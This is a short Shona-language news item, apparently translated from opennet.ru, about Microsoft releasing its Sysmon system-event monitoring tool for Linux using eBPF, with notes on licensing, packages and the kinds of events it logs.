Microsoft yave kushandisa puratifomu iyi Linux Sevhisi yekutarisa zviitiko zveSysmon system. Kutevera basa Linux Sisitimu ye eBPF inoshandiswa, zvichibvumira kushandiswa kwevashandisi vari kushanda padanho re kernel re operating system. Raibhurari yeSysinternalsEBPF, ine mabasa anobatsira pakugadzira vashandisi veBPF vekutarisa zviitiko zvesisitimu, iri kugadzirwa zvakasiyana. Kodhi yetoolkit yakavhurika pasi pe MIT rezinesi, uye mapurogiramu eBPF ane rezinesi pasi peGPLv2. Nzvimbo yekuchengetedza packages.microsoft.com ine mapakeji eRPM neDEB akagadzirira akakodzera kugoverwa kwakakurumbira. Linux.
Sysmon inokutendera iwe kuti uchengetedze logi ine ruzivo rwakadzama nezve kusikwa uye kumisa maitiro, network yekubatanidza uye faira manipulations. Iyo logi inochengeta kwete chete ruzivo rwese, asiwo ruzivo runobatsira pakuongorora zviitiko zvekuchengetedza, senge zita rekuita kwevabereki, hashes yezviri mukati memafaira anoteedzera, ruzivo rwemaraibhurari ane simba, ruzivo nezve nguva yekusika / kuwana / shanduko / kubviswa kwemafaira, data nezve kuwana kwakananga kwemaitiro ekuvharira zvishandiso. Kuti udzikise huwandu hwe data yakanyorwa, zvinokwanisika kugadzirisa mafirita. Iyo log inogona kuchengetwa kuburikidza neyakajairika Syslog.
Source: opennet.ru
